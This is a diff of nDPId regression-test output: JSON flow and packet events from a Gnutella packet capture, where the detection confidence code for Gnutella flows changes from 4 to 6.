-00793{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.197.97.94","src_port":28681,"dst_port":1360,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":129174,"flow_last_seen":129344,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":808,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.226.85.105","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":96049,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.28.53.225","src_port":28681,"dst_port":44859,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":129345,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"99.250.253.99","src_port":28681,"dst_port":11819,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.212.91.155","src_port":28681,"dst_port":5195,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00793{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.197.97.94","src_port":28681,"dst_port":1360,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":129174,"flow_last_seen":129344,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":808,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.226.85.105","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":96049,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.28.53.225","src_port":28681,"dst_port":44859,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82059,"flow_last_seen":131671,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.197.219.85","src_port":28681,"dst_port":26234,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82059,"flow_last_seen":131671,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.197.219.85","src_port":28681,"dst_port":26234,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":123912,"flow_last_seen":123912,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.116.64.132","src_port":28681,"dst_port":51227,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.10.169.10","src_port":28681,"dst_port":12799,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":123912,"flow_last_seen":123912,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.116.64.132","src_port":28681,"dst_port":51227,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.10.169.10","src_port":28681,"dst_port":12799,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82059,"flow_last_seen":131670,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.75.43.182","src_port":28681,"dst_port":43502,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82059,"flow_last_seen":131670,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.75.43.182","src_port":28681,"dst_port":43502,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82062,"flow_last_seen":131669,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.134.107.32","src_port":28681,"dst_port":38836,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -2696,17 +2696,17 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82061,"flow_last_seen":132833,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.157.183.106","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82062,"flow_last_seen":131672,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.3.103.37","src_port":28681,"dst_port":35589,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82062,"flow_last_seen":131672,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.3.103.37","src_port":28681,"dst_port":35589,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":96049,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"100.1.231.138","src_port":28681,"dst_port":56558,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":96049,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"100.1.231.138","src_port":28681,"dst_port":56558,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":131668,"flow_last_seen":131668,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"187.37.87.189","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":131668,"flow_last_seen":131668,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"187.37.87.189","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82059,"flow_last_seen":131673,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.126.160.158","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82059,"flow_last_seen":131673,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.126.160.158","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":124066,"flow_last_seen":124066,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.129.233.60","src_port":28681,"dst_port":19990,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":124066,"flow_last_seen":287321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":836,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":28681,"dst_port":49732,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":124066,"flow_last_seen":124066,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.129.233.60","src_port":28681,"dst_port":19990,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":124066,"flow_last_seen":287321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":836,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":28681,"dst_port":49732,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":131671,"flow_last_seen":251736,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.191.49.159","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":124090,"flow_last_seen":287421,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":28681,"dst_port":6778,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":124090,"flow_last_seen":287890,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.208.26.154","src_port":28681,"dst_port":4994,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":123912,"flow_last_seen":287321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":28681,"dst_port":54130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":124090,"flow_last_seen":287421,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":28681,"dst_port":6778,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":124090,"flow_last_seen":287890,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.208.26.154","src_port":28681,"dst_port":4994,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":123912,"flow_last_seen":287321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":28681,"dst_port":54130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5033,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":2,"flow_last_seen":320290,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":320290,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4TFkAAIARXF4KAAIPdqgPR3AJ5EoAJEU1rxgxAkijNFD\/98wlZJR4AwABAAUAAADDglFLQA=="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5034,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":2,"flow_last_seen":320290,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":320290,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4bmsAAIARqKcKAAIPdPGionAJ4kkAJCDgNOsxArkJ75n\/2X37nQtxAwABAAUAAADDglFLQA=="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5035,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":2,"flow_last_seen":320290,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":320290,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4R1AAAIARd9IKAAIPdqf43HAJ56gAJBG+sRMxAjM8jgr\/OCOtVAIyAwABAAUAAADDglFLQA=="} @@ -2741,59 +2741,59 @@ 